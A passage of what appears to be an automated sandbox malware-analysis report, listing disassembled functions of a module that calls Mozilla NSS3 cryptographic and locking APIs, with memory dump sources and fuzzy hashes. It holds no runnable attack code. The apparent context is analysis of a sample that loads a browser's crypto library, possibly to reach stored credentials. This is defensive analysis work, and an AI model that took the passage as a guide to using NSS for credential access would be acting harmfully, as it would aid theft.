                                                                                                                                                                                                                          • PR_Lock.NSS3(?,?,?,?,?,?,?,6C581193), ref: 6C581D1A
                                                                                                                                                                                                                            • Part of subcall function 6C539BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C461A48), ref: 6C539BB3
                                                                                                                                                                                                                            • Part of subcall function 6C539BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C461A48), ref: 6C539BC8
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6C581193), ref: 6C581D3D
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                            • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,6C581193), ref: 6C581D4E
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6C581193), ref: 6C581D64
                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6C581193), ref: 6C581D6F
                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6C581193), ref: 6C581D7B
                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(?,?,?,?,?,6C581193), ref: 6C581D87
                                                                                                                                                                                                                          • PR_DestroyCondVar.NSS3(00000000,?,?,?,6C581193), ref: 6C581D93
                                                                                                                                                                                                                          • PR_DestroyLock.NSS3(00000000,?,?,6C581193), ref: 6C581D9F
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,6C581193), ref: 6C581DA8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3246495057-0
                                                                                                                                                                                                                          • Opcode ID: cae1d66b2f0cf95c37d1efe2fe80e78f10fc9f1f8a20f2f0846192b904d1f43b
                                                                                                                                                                                                                          • Instruction ID: 9696cfaf0797367fd5f2697e605951775df7a1f3c55923bd30aa4441fae68481
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cae1d66b2f0cf95c37d1efe2fe80e78f10fc9f1f8a20f2f0846192b904d1f43b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A231A6F1E017119BEB10DF25AC41E577AE4AF4165CB044838E85A87F41FB31E918CBD6
                                                                                                                                                                                                                          Function 6C495E60 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 348COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C495ECF
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C495EE3
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C495F0A
                                                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000014), ref: 6C495FB5
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterFromK11_MakeSectionUnlockValue
                                                                                                                                                                                                                          • String ID: NSS_USE_DECODED_CKA_EC_POINT$S&Kl$S&Kl
                                                                                                                                                                                                                          • API String ID: 2280678669-3493570118
                                                                                                                                                                                                                          • Opcode ID: 9ee36f6f3421adb17eea872c6822a720a557d0ccd6e57fb83866a2d16e94dc40
                                                                                                                                                                                                                          • Instruction ID: b66b5fa3fdf5420d864ffc3bd8e17649cb547b83c1de77f52ed53bbac42ed9de
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ee36f6f3421adb17eea872c6822a720a557d0ccd6e57fb83866a2d16e94dc40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 97F1F4B5A002158FDB44CF19C884B86BBF4FF09304F5582AADC089B746E775EA95CF91
                                                                                                                                                                                                                          Function 6C4E0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(*,Nl), ref: 6C4E0C81
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                            • Part of subcall function 6C4B8500: SECOID_GetAlgorithmTag_Util.NSS3(6C4B95DC,00000000,00000000,00000000,?,6C4B95DC,00000000,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B8517
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0CC4
                                                                                                                                                                                                                            • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4E0CD5
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C4E0D1D
                                                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C4E0D3B
                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C4E0D7D
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4E0DB5
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0DC1
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4E0DF7
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4E0E05
                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C4E0E0F
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B95E0
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C497F4A,00000000,?,00000000,00000000), ref: 6C4B95F5
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C4B9609
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4B961D
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: PK11_GetInternalSlot.NSS3 ref: 6C4B970B
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C4B9756
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: PK11_GetIVLength.NSS3(?), ref: 6C4B9767
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C4B977E
                                                                                                                                                                                                                            • Part of subcall function 6C4B95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4B978E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                          • String ID: *,Nl$*,Nl$-$Nl
                                                                                                                                                                                                                          • API String ID: 3136566230-2208369651
                                                                                                                                                                                                                          • Opcode ID: 10a9a8f5b7265a7dd45074ff60fafff3ef5e9c3c5fec30048b4b1175b9359c40
                                                                                                                                                                                                                          • Instruction ID: 311245155af9722638394abcdae3ef89250880e9ccdec5aab4754aa49cb646cb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10a9a8f5b7265a7dd45074ff60fafff3ef5e9c3c5fec30048b4b1175b9359c40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1141D4B5901245ABEB00DF65DC85FAF7A74EF0430AF150128ED2967741EB35EA14CBE2
                                                                                                                                                                                                                          Function 6C4D5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6C4D5EC0,00000000,?,?), ref: 6C4D5CBE
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6C4D5CD7
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6C4D5CF0
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6C4D5D09
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6C4D5EC0,00000000,?,?), ref: 6C4D5D1F
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6C4D5D3C
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5D51
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4D5D66
                                                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6C4D5D80
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                          • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                          • Opcode ID: 29cd6a9d83e34a154c07f3d77fe00581a3ee771a033108f65bed3746360b8752
                                                                                                                                                                                                                          • Instruction ID: 931d330186d0b3dba99ce8def95e78c791b1b96b2d730fd6b643a91cf32ca69d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29cd6a9d83e34a154c07f3d77fe00581a3ee771a033108f65bed3746360b8752
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9631D4F06413416BE701AE249C78F6637A8EF0624AF264034ED55E6B81EFB1F516C2B9
                                                                                                                                                                                                                          Function 6C4D6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C5A1DE0,?), ref: 6C4D6CFE
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D6D26
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C4D6D70
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000480), ref: 6C4D6D82
                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C4D6DA2
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4D6DD8
                                                                                                                                                                                                                          • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C4D6E60
                                                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C4D6F19
                                                                                                                                                                                                                          • PK11_DigestBegin.NSS3(00000000), ref: 6C4D6F2D
                                                                                                                                                                                                                          • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C4D6F7B
                                                                                                                                                                                                                          • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C4D7011
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C4D7033
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D703F
                                                                                                                                                                                                                          • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C4D7060
                                                                                                                                                                                                                          • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C4D7087
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C4D70AF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2108637330-0
                                                                                                                                                                                                                          • Opcode ID: 37ed8fdd6d6512099d1e13aae8ffa969b34efffca1352d8cbc72608b1fa26218
                                                                                                                                                                                                                          • Instruction ID: df4efe1af33bba13e248f48aa5c3cab781072d19ecf1a265aa4099342d9d0e65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 37ed8fdd6d6512099d1e13aae8ffa969b34efffca1352d8cbc72608b1fa26218
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DA1E5715082019BEB00EE24DC65FDA32A5DB8130DF268D3DE958CBB91E775F8458793
                                                                                                                                                                                                                          Function 6C49AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF25
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF39
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF51
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49AF69
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C49B06B
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C49B083
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C49B0A4
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C49B0C1
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C49B0D9
                                                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C49B102
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49B151
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49B182
                                                                                                                                                                                                                            • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C49B177
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1A2
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1AA
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE018,00000000,?,?,?,?,6C47AB95,00000000,?,00000000,00000000,00000000), ref: 6C49B1C2
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: TlsGetValue.KERNEL32(00000000,?,6C490844,?), ref: 6C4C157A
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: EnterCriticalSection.KERNEL32(?,?,?,6C490844,?), ref: 6C4C158F
                                                                                                                                                                                                                            • Part of subcall function 6C4C1560: PR_Unlock.NSS3(?,?,?,?,6C490844,?), ref: 6C4C15B2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSectionUnlock$ErrorItem_UtilZfree$CurrentThreadfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4188828017-0
                                                                                                                                                                                                                          • Opcode ID: c12498728b5fab4414551d046e4ad81d3e4f73a94b3337c1111753a9cd6981b4
                                                                                                                                                                                                                          • Instruction ID: 2f51752879cddfae776422cd77a4c51d43009570e87bf3bb13d2655a16902400
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c12498728b5fab4414551d046e4ad81d3e4f73a94b3337c1111753a9cd6981b4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78A1CFB5E002159BEF00DF64DC45FAABBB4EF09309F144128E809AB751E731E999CBE1
                                                                                                                                                                                                                          Function 6C4A1800 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 169memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A1860
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF), ref: 6C4A1897
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,-00000001,-00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4A18AA
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A18C4
                                                                                                                                                                                                                          • PK11_ImportDataKey.NSS3(00000000,0000402B,00000004,0000010C,?,00000000), ref: 6C4A193F
                                                                                                                                                                                                                          • PK11_DeriveWithTemplate.NSS3 ref: 6C4A1979
                                                                                                                                                                                                                          • PK11_ExtractKeyValue.NSS3(00000000), ref: 6C4A1988
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF,psk_id_hash,0000000B), ref: 6C4A199F
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,00000000,?,-00000001,?,6C4A09BF,psk_id_hash), ref: 6C4A19A8
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE10
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE24
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C49D079,00000000,00000001), ref: 6C4BAE5A
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE6F
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAE7F
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: TlsGetValue.KERNEL32(?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEB1
                                                                                                                                                                                                                            • Part of subcall function 6C4BADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C49CDBB,?,6C49D079,00000000,00000001), ref: 6C4BAEC9
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,?,-00000001), ref: 6C4A19B6
                                                                                                                                                                                                                            • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-00000018), ref: 6C4A19F2
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_$Item_UtilValuememcpy$CriticalEnterFreeSectionfree$AllocDataDeriveExtractImportTemplateUnlockWithZfreememset
                                                                                                                                                                                                                          • String ID: +@$E-v1
                                                                                                                                                                                                                          • API String ID: 3144289787-3744174662
                                                                                                                                                                                                                          • Opcode ID: 4322c2988e1fc1734822200911c8a7dd6460497dec5f4c60d9bf8c626f877ebc
                                                                                                                                                                                                                          • Instruction ID: a36e628f516a4df30d9bf88ead9c21b7f3e733578c029e579f68a6e5856d7899
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4322c2988e1fc1734822200911c8a7dd6460497dec5f4c60d9bf8c626f877ebc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0951A1B6A043019BE700DF69CC40EABB7F8AF98318F04892CE99897751F735D549CB96
                                                                                                                                                                                                                          Function 6C492C40 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 163COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
